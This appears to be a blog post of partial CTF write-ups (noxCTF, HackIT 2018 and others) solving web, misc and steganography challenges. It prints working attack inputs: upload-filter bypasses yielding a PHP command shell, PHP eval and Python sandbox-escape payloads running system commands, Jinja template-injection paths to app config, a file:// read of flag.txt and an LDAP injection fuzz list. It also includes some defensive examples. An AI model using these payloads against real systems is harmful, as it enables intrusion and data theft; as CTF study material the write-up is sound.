Partial noxCTF & hackitctf WriteUp


123

Hint in the page source:

<!-- All user information is in user.php -->
<!-- The default password is username + birth year, e.g. zhangwei1999 -->

user.php is blank, but user.php.bak contains a long list of usernames that can be used for brute-forcing. The flag.php found by scanning does not contain the flag.

In Burp, set the attack type to pitchfork, configure two payload sets and brute-force.
This yields a valid username and password.

ks1.png

Hint in the page source:

<!-- Vulnerable, must be removed -->
<!-- <form action="" method="POST" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" name="submit" value="上传" />
</form> -->

Remove the comment markers, fill in the action, and upload a file.

The extension check is bypassed with a .phtml suffix.

Result:
<a href="/view.php">view</a>

view.php hints at a file parameter; passing one shows filter "flag", so the string flag is being filtered.

Double-write bypass:

http://9df2aa756fb048e7b0df80c187e5d350b037754437604bc6.game.ichunqiu.com/view.php?file=flflagag

flag{d0b2de22-fe4d-48ee-a447-f010dc83c087}

https://shrimphp.herokuapp.com/?%F0%9F%8D%A4=%22.system(ls).%22

<?php
// flag{thisisnotflag}
highlight_file(__FILE__);
$_ = $_GET['🍤'];
//$_ = '".system(ls)."';
if( strpos($_, '"') || strpos($_, "'") || strpos($_, "_") || strpos($_, "[") || strpos($_, "$") )
    die('What did you do?????');

eval('die("' . substr($_, 0, 16) . '");');
echo 'Try harder!!!!';

?🍤=".system(ls)."

flag{php_is_good_for_hackers!!!!}

Web Book

link to Web_BooK:http://34.216.132.109:8083/fp/

The page can only be advanced by clicking "next" over and over, so simulate the clicks with a script.

#coding: utf-8
import requests
import re

url = 'http://34.216.132.109:8083'
get = '/fp/'
s = requests.Session()

while 1:
    r = s.get(url+get)
    h = r.text
    if 'flag' in h:
        print(h)
        break  # the bare `exit` in the original was a no-op, so the loop never stopped
    # the next page is the action of the form on the current page
    get = re.findall('<form action="(.*?)" method="get">', h)[0]
    print('[*] try '+get)

Eventually the flag appears.

ks2.png

Shrine

The challenge provides its source:

import flask
import os


app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])+s
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

The flag is a specific config value. The part after /shrine/ is vulnerable to template injection, but parentheses are stripped and a blacklist is added, so the config value cannot be read that way, and object attributes cannot be fetched that way either.

After reading other writeups I learned that, to reach the config, you have to get at it from the globals above it (current_app and the like).

Examples:

__globals__['current_app'].config['FLAG']

top.app.config['FLAG']

Every function has a __globals__ attribute: a dict of every variable in the namespace of the module the function is defined in.

Some approaches:

  1. The url_for function

  Find current_app

  Read the flag

  2. The get_flashed_messages function

  Find current_app

  Read the flag

  3. request

noxCTF

Reference

What is your reference again?

http://chal.noxale.com:5000

The page shows "where the **** did you come from?", so, as the title suggests, a Referer header has to be added.

From index.js:

$( document ).ready(function() {
    $.ajax({
        url: "check_from_google",
        data: NaN,
        success: function(result) {
            $("#status").html("hello old friend! " + atob(result))
        },
        dataType: NaN
    }).fail(function() {
        $("#status").html("where the **** did you come from?")
    });
});

ks3.png

So http://chal.noxale.com:5000/check_from_google must be where the server checks whether the visitor came from Google:

curl -H "Referer: https://www.google.com/" http://chal.noxale.com:5000/check_from_google

This returns base64; decoding it gives the flag.

noxCTF{G0ogL3_1s_4lW4Ys_Ur_b3ST_R3f3r3nc3}

MyFileUploader

This is my new file uploader server. I bet you can’t hack it!

http://chal.noxale.com:8079

The page is a file upload form; capture the request.

The server always strips a trailing .php, and the name must contain an image suffix such as .jpg, so a file named .jpg.php.php uploads successfully.

ks5.png

index.php:

<html>
<head>
    <title>My file uploading website!</title>
    <meta name = "viewport" content = "width = device-width, initial-scale = 1">
    <link rel = "stylesheet"
        href = "https://fonts.googleapis.com/icon?family=Material+Icons">
    <link rel = "stylesheet"
        href = "https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css">
    <script type = "text/javascript"
        src = "https://code.jquery.com/jquery-2.1.1.min.js"></script>
    <script src = "https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js">
    </script>
</head>

<body class = "container">
    <h5> It is the most secure uploading server in the world! <br></h5>
    <div class = "row">
        <form enctype="multipart/form-data" class = "col s6 push-s3" method="POST" action=''>
            <div class = "row">
                <div class = "file-field input-field">
                    <div class = "btn">
                        <span>Browse</span>
                        <input type = "file" name="upload"/>
                    </div>

                    <div class = "file-path-wrapper">
                        <input class = "file-path validate" type = "text"
                            placeholder = "Upload file" />

                        <button class="btn waves-effect waves-light" type="submit" name="action">Submit
                            <i class="material-icons right">send</i>
                        </button>

                    </div>

                    <p style="text-align:center" class="col push-s3">
<?php

if(isset($_POST['action']))
{
    if($_FILES["upload"]["error"] != 0) die("Problem occured with file upload");
    $target_path = "uploads";
    $file_name = $_FILES["upload"]['name'];
    $file_type = $_FILES["upload"]['type'];
    $file_name = preg_replace("/(\.php$|\.html$)/i", "", $file_name);

    echo "File: " . $file_name . "<br>";
    if(preg_match("/(.jpg|.png|.gif)/i", $file_name))
    {
        move_uploaded_file($_FILES['upload']['tmp_name'], "{$target_path}/{$file_name}");
        echo "Image uploaded to: <a href='{$target_path}/{$file_name}'>Here</a> <br>";
    }
    else
    {
        echo "There is no .png/.jpg/.gif in that file name";
    }
}
?>
                    </p>
                </div>
            </div>
        </form>
    </div>
</body>
</html>
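To make the two weaknesses in index.php concrete, here is an added Python port of its filename checks next to a hardened version. This is my own example, not the challenge's code; the regexes are the ones from index.php, while hardened_filename's policy (whitelist the final extension only and let the server pick the stored name) is my assumption.

```python
import re
import secrets

IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def challenge_filename(name: str) -> str:
    """Port of the index.php logic: strip ONE trailing .php/.html, then accept
    if '.jpg', '.png' or '.gif' occurs anywhere. Returns the stored name."""
    # preg_replace("/(\.php$|\.html$)/i", "", ...) removes only a single trailing suffix,
    # so "shell.jpg.php.php" becomes "shell.jpg.php".
    stripped = re.sub(r"(\.php$|\.html$)", "", name, flags=re.I)
    # preg_match("/(.jpg|.png|.gif)/i", ...): substring match anywhere, and the
    # dot is unescaped, so "xjpg" also satisfies it.
    if re.search(r"(.jpg|.png|.gif)", stripped, flags=re.I):
        return stripped
    raise ValueError("There is no .png/.jpg/.gif in that file name")


def hardened_filename(name: str) -> str:
    """Hardened variant: look only at the FINAL extension, whitelist it, drop any
    path component, and never reuse the client-supplied base name."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]  # strip directory parts
    if "." not in base:
        raise ValueError("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    # server-chosen name: random token plus the whitelisted extension
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for candidate in ("shell.jpg.php.php", "xjpg.php", "photo.JPG"):
        for check in (challenge_filename, hardened_filename):
            try:
                print(f"{check.__name__}({candidate!r}) -> {check(candidate)!r}")
            except ValueError as err:
                print(f"{check.__name__}({candidate!r}) rejected: {err}")
```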

However, connecting with Caidao (China Chopper) returned a 500. Uploading a PHP file that runs commands directly worked, but I could not find the flag anywhere: the files under uploads that might contain it, such as 7H3-FL4G-1S-H3r3 and flag.txt, were not accessible (no permission), so permissions must have been restricted deliberately.

Contents of ../.htaccess:

Options +Indexes
AddType application/x-httpd-php .cyb3r

<files flag.txt>
order allow,deny
deny from allow
</files>
<files "Dockerfile">
Order deny,allow
Deny from all
</files>
<files "apache2.conf">
Order deny,allow
Deny from all
</files>
<files ".htaccess">
Order deny,allow
Deny from all
</files>

IndexIgnore *php *pht *txt *png *jpg *gif *cyb3r *php* *Cyb3r

At that point I was stuck. I dropped a .htaccess into uploads, after which requesting uploads gave an Internal Server Error; I probably broke it.

A few hours later it worked again, so the admin must have reset the challenge. This time there were fewer files under uploads, and the flag should be inside 7H3-FL4G-1S-H3r3, but it still said "don't have permission to access /uploads/7H3-FL4G-1S-H3r3".

In the end the flag showed up when I listed the permissions with ls -l.

ks6.png

Marcode

Marcode (Mr. Code in Hebrew), I need your help!
I got a movie but I can't see it. It hypnotizes me.
please help me!
yours,
Gveretcode (Mrs. Code in Hebrew)

P.S.
change NOXCTF to noxCTF.
https://drive.google.com/open?id=1GkalBntU1s6d_sw_S5I4GinD8hBrh-C-

This was an interesting one.

Downloading from the URL gives an mp4; when played, it flips between QR codes so fast that none can be scanned.

ks7.png

It runs for over two minutes, so a script is needed.

#coding: utf-8

import cv2

videoCapture = cv2.VideoCapture()
videoCapture.open('/Users/xc/Downloads/Marcode.mp4')

fps = videoCapture.get(cv2.CAP_PROP_FPS)
frames = videoCapture.get(cv2.CAP_PROP_FRAME_COUNT)
# fps is the frame rate (frames refreshed per second); frames is the total number of frames in the video.
print("fps=", fps, "frames=", frames)

for i in range(int(frames)):
    ret, frame = videoCapture.read()
    if not ret:  # stop if the decoder returns no frame (frame count can be an estimate)
        break
    cv2.imwrite("./Marcode-jpg/mp4-(%d).jpg" % i, frame)

Every frame of the video is saved as a jpg, 3490 in total. Each QR code decodes to a Google Drive URL, and opening it shows a small image containing a single character.

Then a script scans every jpg. Most URLs repeat; there are 28 distinct ones in the end.

ks8.png

So each URL stands for one character. I built a URL-to-character dictionary with a script, ran over the jpgs again and got a text: Harry Potter, Chapter 1, "The Dark Lord Ascending".

Search for the original text, clean it up, then compare in Burp Comparer; that should give the flag.

ks9.png

Harry Potter, of all things; the source texts differ between editions and my eyes nearly gave out. The differences I finally found:

n o x ctf a into-with v impaosing-impressive d a was-were k e d a toward-towards inward-inwards v wall-walls r  upward -upwards a

I had no idea how the flag was meant to be written; after the contest a writeup revealed it was noxCTF{AVADAKEDAVRA}.

The scanning script:

#coding: utf-8
from PIL import Image
from pyzbar.pyzbar import decode

urllist = []
picdict = {}
pdic = {'https://drive.google.com/open?id=131OPuwNVggs0ZAsVie4dfA3k9zLWN-uu': 'T', 'https://drive.google.com/open?id=1c-go7QIZb_yqGDsRKlXG1j1Py7-wcSFG': 'H', 'https://drive.google.com/open?id=1upmw0QvLjzp6b7RjCrjJGjYfRijF82-g': 'E', 'https://drive.google.com/open?id=1vHlCNodJ84iw51C8gIz4hr0UpsWNx3fm': '_', 'https://drive.google.com/open?id=1mZivmNZ8uDiUb5YUoF8sj9kZXKkh7GNO': 'W', 'https://drive.google.com/open?id=1pXSHKhMzuKrUMg0x8ygZ36yTn0-9nBe8': 'O', 'https://drive.google.com/open?id=1b5wz-LsIBxnA7mp5ImbNLZQY0nob94OO': 'M', 'https://drive.google.com/open?id=1cZlhiRoZcEiaNEwScBQd0IA2PXh1Z1tX': 'N', 'https://drive.google.com/open?id=1OqacmR-Ccc2YLVYCS2co4dWtSqfEGxIl': 'A', 'https://drive.google.com/open?id=1DF2RneUWAb6wqp7YJ0vjOwDJGdENEc0Q': 'P', 'https://drive.google.com/open?id=1lKeCjQFcTSuUzMGUEeEzPj4d2x1MLTJm': 'R', 'https://drive.google.com/open?id=1JtDxAfX8AEC_mFzJPZofI1RyOL62MAmk': 'D', 'https://drive.google.com/open?id=1hjIQq2fEcduFF0CfRs-MJ2hlCuC5lkW6': 'U', 'https://drive.google.com/open?id=1rHGDe2F5vLws9fA0M3L9IELX9LYaU50x': 'F', 'https://drive.google.com/open?id=1p4m9gtvh31s2SJ9G1uNr8burIvQabm_k': '?', 'https://drive.google.com/open?id=1g2I1a09lO4m0imhIzJ60LUeDPNDIdIp_': 'Y', 'https://drive.google.com/open?id=1lSanpoEq3LeV0aaL6KEnUiJE2iGijdrt': 'S', 'https://drive.google.com/open?id=1Rw-Op049iTliLPFTTRj7p4gBXmm8IboN': 'I', 'https://drive.google.com/open?id=1H5DHyv0METKfLV7xdzw-SVXU_F1o1iKM': 'L', 'https://drive.google.com/open?id=1GLtL-X1IS4ms6fwC2OQV4jAmXjI_6bjQ': 'C', 'https://drive.google.com/open?id=1vPBtiNzUzYEOEKFK60vG305uPw9CDy8p': 'Q', 'https://drive.google.com/open?id=1DV0ACuyKWsFm2ApXgHHDP_DSzwqmtt5M': 'G', 'https://drive.google.com/open?id=1nlp-HIwnRbG61mf5SF_BzMdlNAR7tHLt': 'Z', 'https://drive.google.com/open?id=151y0xa6hnTR9yp9G0D-dyox08bV4-JZX': 'B', 'https://drive.google.com/open?id=1dtYor_A9Sf3DDTlczTLA0s9rBluVNoOX': 'K', 'https://drive.google.com/open?id=1UpU1_MTK-0XgCpcZKC4AVGsBswNpQTBO': 'X', 
'https://drive.google.com/open?id=1apKMrqUwZn5dOkRWfjbYgYH_RvkmPD2P': 'V', 'https://drive.google.com/open?id=1uynnoN7ItBRls7MiqFa1rLE-W3o9CnY5': 'J'}
sum = 0
code = []
codes = "THE_WOMNAPRDUF?YSILCQGZBKXVJ"
string = ''
for ac in codes:
    code.append(ac)
'''print (code)'''
for i in range(0,3490):
    name = "mp4-("+str(i)+").jpg"
    decode_result = decode(Image.open(name))
    url = str(decode_result[0].data, encoding='utf-8')
    string = string + pdic[url]
    print (string)
    '''
    if url not in urllist:
        picdict[url] = code[sum]
        sum = sum + 1
        urllist.append(url)
        #print ('[+] '+name+' :'+url)
    '''
#print ("totla is "+str(sum))
#print (picdict)
print (string)

The following notes were written after reading other writeups.

hiddenDOM

I decided to create a tool that searches for
hidden elements inside web pages.
A few days ago someone told me that my website is not so /secure/…
Can you check it yourself ?

http://13.59.2.198:5588

A piece of JS, after decoding:

var _0x2b80 = ["slow", "fadeOut", "#hidden_elements", "click", "#hideArea", "ready", "fadeIn", "#showArea"];
$(document)[_0x2b80[5]](function() {
    $(_0x2b80[4])[_0x2b80[3]](function() {
        $(_0x2b80[2])[_0x2b80[1]](_0x2b80[0]);
    });
});
$(document)[_0x2b80[5]](function() {
    $(_0x2b80[7])[_0x2b80[3]](function() {
        $(_0x2b80[2])[_0x2b80[6]](_0x2b80[0]);
    });
});

Its effect is to produce:

<form id="main_form" action="index.php" style="position:sticky;">
<input name="expression" placeholder="/<[^<>]{1,}hidden[^<>]{1,}>/" type="text">

Compared with before, an expression now has to be entered as well.

Entering the path from the source, <a href='/var/www/html/flag.txt' hidden >-_-</a><p style='color:red;'></p>, yields another piece of JS, which turns out to be useless.

With a regex that satisfies the expression check, the file is read through file://:

?target=file:///var/www/html/flag.txt&expression=/.*/

Python for fun - Misc

http://chal.noxale.com:8000/

Two parameters are passed that get interpreted, which allows injection.

ks10.png

a,b=print(exec("import os"),eval("os.listdir('.')"))

a,b=print(open("FLAG", "r").read())

Python for fun 2

''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"].modules["os"].system("cat FLAG")

LDAP injection

http://web.chal.csaw.io:8080/index.php?search=

LDAP injection is an attack used to exploit web-based applications that construct LDAP statements from user input. When an application fails to properly sanitize user input, the LDAP statement can be modified through a local proxy. This may result in the execution of arbitrary commands, such as granting permissions to unauthorized queries, and content modification inside the LDAP tree. The same advanced exploitation techniques available in SQL injection can be applied in LDAP injection in a similar way.

The server-side query is roughly:
(&(GivenName=<INPUT>)(!(GivenName=Flag)))

Bypass with *)(uid=*))(|(uid=*

Full statement:
(&(GivenName=*)(uid=*))(|(uid=*)(!(GivenName=Flag)))

Query syntax:
http://www.361way.com/ldap-query-grammar/2542.html
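The fix for this class of bug is RFC 4515 escaping of the assertion value before it is spliced into the filter. The added Python below (my example, not the challenge's code) builds the filter from the writeup both ways and includes a small structural check that flags the injected version, because the injection works precisely by closing the outer group early and opening a second one.

```python
# RFC 4515 escapes for characters that carry meaning inside a filter assertion value
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

FILTER_TEMPLATE = "(&(GivenName={value})(!(GivenName=Flag)))"


def escape_filter_value(value: str) -> str:
    """Escape a user-supplied value so it cannot alter the filter structure."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(user_input: str) -> str:
    """The pattern behind the challenge: raw concatenation into the filter."""
    return FILTER_TEMPLATE.format(value=user_input)


def build_filter_safe(user_input: str) -> str:
    """Same template, but the value is escaped first."""
    return FILTER_TEMPLATE.format(value=escape_filter_value(user_input))


def is_single_group(filter_str: str) -> bool:
    """Structural sanity check: a well-formed filter is exactly one balanced
    parenthesised group. Returning to depth 0 before the last character means
    a second top-level group was appended, which is what the injection does."""
    depth = 0
    last = len(filter_str) - 1
    for i, ch in enumerate(filter_str):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
            if depth == 0 and i != last:
                return False
    return depth == 0 and filter_str.startswith("(")


if __name__ == "__main__":
    injected = "*)(uid=*))(|(uid=*"  # the input from the writeup
    for build in (build_filter_unsafe, build_filter_safe):
        f = build(injected)
        print(f"{build.__name__}: {f}  single_group={is_single_group(f)}")
```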

Fuzz list:

*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)

hackitctf

ge going

https://ctf.hackit.ua/w31c0m3

This is a fairly new steganography idea, and there is little material on it.

Zero-width characters are hidden, not displayed, and unprintable; in other words, most programs and editors cannot see them.

Related articles:

In the challenge sentence "W‏‍‏‌‎‎‏‍‏‎‏‏‎‏‎‏‍‌‎‏‏‎‏‍‏‍‌‍‌‍‌‎‏‏‏‍‍‎‏‏‏‌‍‍‌‏‍‏‏‏‍‎‏‏‎‏‌‏‏‏‎‌‏‏‎‏‏‎‍‏‍‌‏‏‎‏‏‌‏‎‏‍‌‌elcome to the HackIT 2018 CTF, flag is somewhere here. ¯_(ツ)_/¯", the following zero-width characters are hidden between the W and the e:

&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&zwj;&#8203;&#8203;&#8203;&#8203;&rlm;&zwnj;&lrm;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&zwj;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&rlm;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&zwj;&rlm;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&zwj;&zwnj;&#8203;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&rlm;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwj;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&rlm;&zwnj;&zwj;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&rlm;&zwj;&rlm;&#8203;&#8203;&#8203;&#8203;&rlm;&rlm;&zwj;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&zwnj;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&zwnj;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&rlm;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&zwj;&#8203;&#8203;&#8203;&#8203;&rlm;&zwj;&#8203;&#8203;&#8203;&#8203;&#8203;&zwnj;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&zwnj;&rlm;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&zwnj;&#8203;&#8203;&#8203;

&zwnj;

This is the zero-width non-joiner (ZWNJ), a non-printing character placed between two characters of electronic text to suppress a ligature that would otherwise form, so that both characters are drawn with their original glyphs. Its Unicode code point is U+200C (zero width non-joiner); its HTML character reference is &zwnj;.

&zwj;

This is the zero-width joiner (ZWJ), a non-printing character placed between two characters in languages that need complex shaping (Arabic, Hindi and so on), so that two characters that would not otherwise join are rendered as a ligature. Its code point is U+200D (HTML: &zwj;).

&lrm;

The left-to-right mark (LRM) is a control character, an invisible layout mark. Its code point is U+200E; in HTML it is written &lrm;, and in UTF-8 it is E2 80 8E.

&rlm;

The right-to-left mark (RLM) is a control character used in bidirectional text layout. Its code point is U+200F; in HTML it is written &rlm;.

&#8203;

The zero-width space (ZWSP) is a non-printing Unicode character used where a line break may occur. Its code point is U+200B; in HTML it is written &#8203;.

The zero-width characters here can be decoded with https://github.com/offdev/zwsp-steg-js
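From the defender's side, the useful step is spotting that such a run exists at all. The added Python below (my example, unrelated to zwsp-steg-js) scans text for the five characters listed above, reports each hidden run at its position in the visible text in the same entity form the writeup shows, and strips them; the embedded sample sentence is constructed and carries a payload of my own, not the challenge's.

```python
import html

# The five zero-width / bidi control characters discussed above, keyed to the
# HTML entity form the writeup uses to display them.
ZERO_WIDTH = {
    "\u200b": "&#8203;",  # zero-width space (ZWSP)
    "\u200c": "&zwnj;",   # zero-width non-joiner (ZWNJ)
    "\u200d": "&zwj;",    # zero-width joiner (ZWJ)
    "\u200e": "&lrm;",    # left-to-right mark (LRM)
    "\u200f": "&rlm;",    # right-to-left mark (RLM)
}


def find_hidden_runs(text):
    """Return [(visible_offset, entities)] for every run of zero-width characters.
    visible_offset counts only visible characters, so a run between 'W' and
    'elcome' is reported at offset 1."""
    runs, visible, current = [], 0, []
    for ch in text:
        if ch in ZERO_WIDTH:
            current.append(ZERO_WIDTH[ch])
            continue
        if current:
            runs.append((visible, "".join(current)))
            current = []
        visible += 1
    if current:  # run at the very end of the text
        runs.append((visible, "".join(current)))
    return runs


def strip_zero_width(text):
    """Sanitised copy of the text with every zero-width character removed."""
    return "".join(ch for ch in text if ch not in ZERO_WIDTH)


def entities_to_chars(entities):
    """Inverse of the display form: turn an entity dump back into raw characters."""
    return html.unescape(entities)


# Constructed sample (payload is arbitrary, not the challenge's hidden data)
SAMPLE = "W" + "\u200b\u200b\u200f\u200d\u200c\u200e" + "elcome to the HackIT 2018 CTF"

if __name__ == "__main__":
    for offset, run in find_hidden_runs(SAMPLE):
        print(f"hidden run at visible offset {offset}: {run}")
    print(strip_zero_width(SAMPLE))
```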

The content of de.js:

ks11.png

Running it produces the flag.

ks12.png

Author: J0k3r
Post link: http://j0k3r.top/2018/09/26/ctfs_18_9/
Copyright: Unless otherwise stated, all posts on this blog are licensed under CC BY-NC-SA 4.0. Please credit J0k3r's Blog when reposting.